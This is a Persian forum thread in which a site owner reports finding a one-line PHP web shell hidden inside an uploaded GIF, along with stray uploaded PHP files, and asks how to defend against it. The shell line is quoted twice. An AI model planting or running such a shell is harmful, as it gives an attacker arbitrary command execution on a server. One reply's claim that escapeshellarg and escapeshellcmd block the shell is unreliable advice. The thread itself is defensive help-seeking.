مشکل امنیتی

[foranyone]

سلام

سایتم یک قسمت آپلود عکس داره محدودش کردم که فقط از فایل های تصویری پشتیبانی کنه و فایل

php و ... به آپلود نمیشه !

من الان یکی از فایل های gif رو پریویو نمیشد باز کردم و متوجه شدم داخل یک دستور php نوشته شده !

<?php
@system($_REQUEST['Command']);
?>

اولا این دستور چه خطراتی میتونه داشته باشه ؟

چطوری میشه کاری کرد که دستور بالا اجرا نشه :

دستورات زیر چه کاری انجام میدن :
escapeshellarg

escapeshellcmd

در ضمن من یکسری فایل php هم دیدم که آپلود شده اینا چطوری آپلود شده ؟ در صورتی که من امکان این کار

رو ندادم ؟ برای آپلود هم از کلاس مشهوری استفاده کردم .

دستوری که داخل فایل gif نوشته شده میشه اجرا بشه ؟

 

[P.H.P]

سلام

این صفحه رو بخون به تمام سوالات میرسی

http://blog.insicdesigns.com/2009/01/secure-file-upload-in-php-web-applications/

موفق

 

[k2-4u]

<?php
@system($_REQUEST['Command']);
?>

با این دستور میشه هر . دستور command line که بخوای رو اجرا کرد!!
یعنی همه چی !؟! از اتصال به mysql گرفته تا !! دستکاری فایل های روی هاست
ولی تابع system رو روی هاست های اشتراکی غیرفعال می کنند ! .

escapeshellarg

escapeshellcmd

این دو دستور دقیقا برای جلو گیری از همین کاراست !
از ورود دستورات command line جلوگیری میکنه (مثل جلوگیری از sql injection یا HTML )